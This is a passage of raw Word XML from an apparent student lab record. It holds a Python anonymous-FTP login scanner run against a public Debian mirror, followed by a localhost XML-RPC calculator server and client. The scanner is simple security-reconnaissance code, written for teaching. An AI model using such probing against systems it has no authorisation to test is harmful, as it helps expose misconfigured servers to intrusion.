        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6910">
        <w:t>For each target host: try a TCP connection to port 21 (quick reachability check).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13908041" w14:textId="77777777" w:rsidR="006C6910" w:rsidRPr="006C6910" w:rsidRDefault="006C6910" w:rsidP="006C6910">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6910">
        <w:t xml:space="preserve">If reachable, open an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6910">
        <w:t>ftplib.FTP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6910">
        <w:t xml:space="preserve"> connection and attempt login('anonymous', 'anonymous@').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2994FD87" w14:textId="77777777" w:rsidR="006C6910" w:rsidRPr="006C6910" w:rsidRDefault="006C6910" w:rsidP="006C6910">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6910">
        <w:t>Record and print whether anonymous login succeeded, was refused, or connection failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CEFB8F" w14:textId="77777777" w:rsidR="006C6910" w:rsidRDefault="006C6910" w:rsidP="006C6910">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6910">
        <w:t>Repeat for all targets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518F41E5" w14:textId="77777777" w:rsidR="00645639" w:rsidRDefault="00645639" w:rsidP="00645639"/>
    <w:p w14:paraId="113E9602" w14:textId="4A1CCC95" w:rsidR="00645639" w:rsidRDefault="006236D1" w:rsidP="00645639">
      <w:r w:rsidRPr="006236D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CA7ECF" w14:textId="2AA692FC" w:rsidR="006236D1" w:rsidRDefault="00B90564" w:rsidP="00645639">
      <w:r w:rsidRPr="00B90564">
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B90564">
        <w:t>ftplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B90564">
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B90564">
        <w:t>anonymousLogin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B90564">
        <w:t>(hostname):</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90564">
        <w:br/>
        <w:t>    try:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90564">
        <w:br/>
        <w:t xml:space="preserve">        ftp = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B90564">
        <w:t>ftplib.FTP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B90564">
        <w:t>(hostname)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90564">
        <w:br/>
        <w:t xml:space="preserve">        response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B90564">
        <w:t>ftp.login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B90564">
        <w:t>('anonymous', 'anonymous')</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90564">
        <w:br/>
        <w:t>        print(response)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90564">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B90564">
        <w:lastRenderedPageBreak/>
        <w:t>        if "230 Anonymous access granted" in response:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90564">
        <w:br/>
        <w:t>            print('\n[*] ' + str(hostname) +' FTP Anonymous Login Succeeded.')</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90564">
        <w:br/>
        <w:t>            print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B90564">
        <w:t>ftp.getwelcome</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B90564">
        <w:t>())</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90564">
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B90564">
        <w:t>ftp.dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B90564">
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90564">
        <w:br/>
        <w:t>    except Exception as e:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90564">
        <w:br/>
        <w:t>        print(str(e))</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90564">
        <w:br/>
        <w:t>        print('\n[-] ' + str(hostname) +' FTP Anonymous Login Failed.')</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90564">
        <w:br/>
        <w:t>hostname = 'ftp.be.debian.org'</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90564">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B90564">
        <w:t>anonymousLogin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B90564">
        <w:t>(hostname)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B79CE1" w14:textId="77777777" w:rsidR="00B90564" w:rsidRDefault="00B90564" w:rsidP="00645639"/>
    <w:p w14:paraId="49B84FB4" w14:textId="2F77394A" w:rsidR="00EC799F" w:rsidRDefault="00EC799F" w:rsidP="00645639">
      <w:r w:rsidRPr="00EC799F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779E5DCB" w14:textId="1F6D96FD" w:rsidR="00EC799F" w:rsidRPr="006C6910" w:rsidRDefault="008562F9" w:rsidP="00645639">
      <w:r w:rsidRPr="008562F9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A461AB6" wp14:editId="5111A980">
            <wp:extent cx="5731510" cy="4001135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="3751729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72986" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4001135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA74899" w14:textId="77777777" w:rsidR="00DE7485" w:rsidRDefault="00DE7485" w:rsidP="00DE7485"/>
    <w:p w14:paraId="6F59AFD1" w14:textId="77777777" w:rsidR="00DE7485" w:rsidRPr="00DE7485" w:rsidRDefault="00DE7485" w:rsidP="00DE7485"/>
    <w:p w14:paraId="34A53799" w14:textId="64579F13" w:rsidR="00355342" w:rsidRDefault="003A50DD" w:rsidP="00A52A5F">
      <w:r w:rsidRPr="003A50DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2541E2" w14:textId="6CCCAFEE" w:rsidR="003A50DD" w:rsidRDefault="000E3289" w:rsidP="00A52A5F">
      <w:r w:rsidRPr="000E3289">
        <w:t xml:space="preserve">The anonymous FTP scanner successfully attempted connections to target hosts  and tried to log in using the anonymous account. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E27A459" w14:textId="77777777" w:rsidR="00355342" w:rsidRDefault="00355342" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="22F088E9" w14:textId="77777777" w:rsidR="00355342" w:rsidRDefault="00355342" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="0A030EB1" w14:textId="19C5DE3C" w:rsidR="00355342" w:rsidRDefault="00A13B35" w:rsidP="009F0934">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">DEVELOP A SIMPLE CALCULATOR USING </w:t>
      </w:r>
      <w:r w:rsidR="009F0934">
        <w:t>XML-RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8D8095" w14:textId="77777777" w:rsidR="00355342" w:rsidRDefault="00355342" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="1C8CD5DE" w14:textId="3A68E38F" w:rsidR="00355342" w:rsidRDefault="00770F8B" w:rsidP="00A52A5F">
      <w:r>
        <w:t>Ex. No</w:t>
      </w:r>
      <w:r w:rsidR="009F0934">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="006B10E7">
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EFBF68" w14:textId="77777777" w:rsidR="009F0934" w:rsidRDefault="009F0934" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="64FF3D15" w14:textId="3D860396" w:rsidR="000E1997" w:rsidRPr="000E1997" w:rsidRDefault="000E1997" w:rsidP="000E1997">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E1997">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>duction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C862D57" w14:textId="77777777" w:rsidR="000E1997" w:rsidRDefault="000E1997" w:rsidP="000E1997">
      <w:r w:rsidRPr="000E1997">
        <w:t xml:space="preserve">An XML-RPC calculator exposes arithmetic functions (add, sub, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E1997">
        <w:t>mul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E1997">
        <w:t>, div, pow) over HTTP so a client can call them remotely using the XML-RPC protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F43FFA8" w14:textId="77777777" w:rsidR="000E1997" w:rsidRPr="000E1997" w:rsidRDefault="000E1997" w:rsidP="000E1997"/>
    <w:p w14:paraId="62862DC2" w14:textId="5EB3AAEB" w:rsidR="000E1997" w:rsidRPr="000E1997" w:rsidRDefault="000E1997" w:rsidP="000E1997">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E1997">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50964C6F" w14:textId="77777777" w:rsidR="000E1997" w:rsidRDefault="000E1997" w:rsidP="000E1997">
      <w:r w:rsidRPr="000E1997">
        <w:t>Build a simple XML-RPC server that provides calculator functions and a client that calls them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75895A6E" w14:textId="77777777" w:rsidR="000E1997" w:rsidRPr="000E1997" w:rsidRDefault="000E1997" w:rsidP="000E1997"/>
    <w:p w14:paraId="30FF19D0" w14:textId="6BBB49F1" w:rsidR="000E1997" w:rsidRPr="000E1997" w:rsidRDefault="000E1997" w:rsidP="000E1997">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E1997">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Algorithm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458E1216" w14:textId="77777777" w:rsidR="000E1997" w:rsidRPr="000E1997" w:rsidRDefault="000E1997" w:rsidP="000E1997">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E1997">
        <w:t>Create an XML-RPC server that registers calculator functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7658A171" w14:textId="77777777" w:rsidR="000E1997" w:rsidRPr="000E1997" w:rsidRDefault="000E1997" w:rsidP="000E1997">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E1997">
        <w:t>Start the server on localhost and a chosen port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413668E2" w14:textId="77777777" w:rsidR="000E1997" w:rsidRPr="000E1997" w:rsidRDefault="000E1997" w:rsidP="000E1997">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E1997">
        <w:t>Client connects to server URL and calls functions with arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F627141" w14:textId="77777777" w:rsidR="000E1997" w:rsidRPr="000E1997" w:rsidRDefault="000E1997" w:rsidP="000E1997">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E1997">
        <w:t>Server executes the function and returns result. Client prints it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7607A5DC" w14:textId="77777777" w:rsidR="009F0934" w:rsidRDefault="009F0934" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="2045C5D0" w14:textId="4ED4C6FD" w:rsidR="00355342" w:rsidRDefault="000E1997" w:rsidP="00A52A5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E1997">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3412B628" w14:textId="03CBA990" w:rsidR="00914783" w:rsidRDefault="00914783" w:rsidP="00A52A5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDF779E" w14:textId="77777777" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xmlrpc.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SimpleXMLRPCServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7DFCB1D3" w14:textId="77777777" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:r>
        <w:t>def add(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>a,b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623EEC27" w14:textId="77777777" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>a+b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22F681CA" w14:textId="77777777" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:r>
        <w:t>def sub(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>a,b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DDF241" w14:textId="77777777" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:r>
        <w:tab/>
        <w:t>return a-b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA39995" w14:textId="77777777" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>a,b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3547A72C" w14:textId="77777777" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:r>
        <w:tab/>
        <w:t>return a*b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E505C0" w14:textId="77777777" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:r>
        <w:t>def div(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>a,b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251A4429" w14:textId="77777777" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>return a/b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB58F37" w14:textId="77777777" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:r>
        <w:t>def mod(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>a,b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F442544" w14:textId="77777777" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>a%b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74569E4E" w14:textId="77777777" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:r>
        <w:t>server=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SimpleXMLRPCServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(("localhost",8000))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A04193D" w14:textId="77777777" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:r>
        <w:t>print("Listening on port 8000...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A48F939" w14:textId="77777777" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>server.register_function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>add,"add</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8DE528" w14:textId="77777777" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>server.register_function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sub,"sub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9D2D7D" w14:textId="77777777" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>server.register_function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE6D4ED" w14:textId="77777777" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>server.register_function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>div,"div</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24834AA3" w14:textId="77777777" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>server.register_function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mod,"mod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4B9942" w14:textId="5BD30E14" w:rsidR="00914783" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>server.serve_forever</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB83918" w14:textId="77777777" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7"/>
    <w:p w14:paraId="5E4652B6" w14:textId="5A12E7E7" w:rsidR="00F80FA7" w:rsidRDefault="00F80FA7" w:rsidP="00F80FA7">
      <w:r w:rsidRPr="00F80FA7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B694FF3" w14:textId="77777777" w:rsidR="00DA5A41" w:rsidRDefault="00DA5A41" w:rsidP="00DA5A41">
      <w:r>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xmlrpc.client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="522CE0DD" w14:textId="77777777" w:rsidR="00DA5A41" w:rsidRDefault="00DA5A41" w:rsidP="00DA5A41">
      <w:r>
        <w:t>proxy=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xmlrpc.client.ServerProxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("http://localhost:8000/")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBB51FB" w14:textId="77777777" w:rsidR="00DA5A41" w:rsidRDefault="00DA5A41" w:rsidP="00DA5A41">
      <w:r>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in range(5):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1344DFE8" w14:textId="77777777" w:rsidR="00DA5A41" w:rsidRDefault="00DA5A41" w:rsidP="00DA5A41">
      <w:r>
        <w:tab/>
        <w:t>a=int(input("Enter a number:"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544E72F7" w14:textId="77777777" w:rsidR="00DA5A41" w:rsidRDefault="00DA5A41" w:rsidP="00DA5A41">
      <w:r>
        <w:tab/>
        <w:t>b=int(input("Enter b number:"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609D4399" w14:textId="77777777" w:rsidR="00DA5A41" w:rsidRDefault="00DA5A41" w:rsidP="00DA5A41">
      <w:r>
        <w:tab/>
        <w:t>print("addition of given number is %d "%((</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>proxy.add</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>a,b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C372492" w14:textId="77777777" w:rsidR="00DA5A41" w:rsidRDefault="00DA5A41" w:rsidP="00DA5A41">
      <w:r>
        <w:tab/>
        <w:t>print("sub of given number is %d "%((</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>proxy.sub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>a,b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A829C4D" w14:textId="77777777" w:rsidR="00DA5A41" w:rsidRDefault="00DA5A41" w:rsidP="00DA5A41">
      <w:r>
        <w:tab/>
        <w:t>print("multiplication of given number is %d "%((</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>proxy.mul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>a,b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB316B5" w14:textId="77777777" w:rsidR="00DA5A41" w:rsidRDefault="00DA5A41" w:rsidP="00DA5A41">
      <w:r>
        <w:tab/>
        <w:t>print("division of given number is %d "%((</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>proxy.div</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>a,b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3E3783" w14:textId="547AE456" w:rsidR="00F80FA7" w:rsidRDefault="00DA5A41" w:rsidP="00DA5A41">
      <w:r>
        <w:tab/>
        <w:t>print("mod of given number is %d "%((proxy.mod(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>a,b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343B482E" w14:textId="77777777" w:rsidR="00DA5A41" w:rsidRDefault="00DA5A41" w:rsidP="00DA5A41"/>
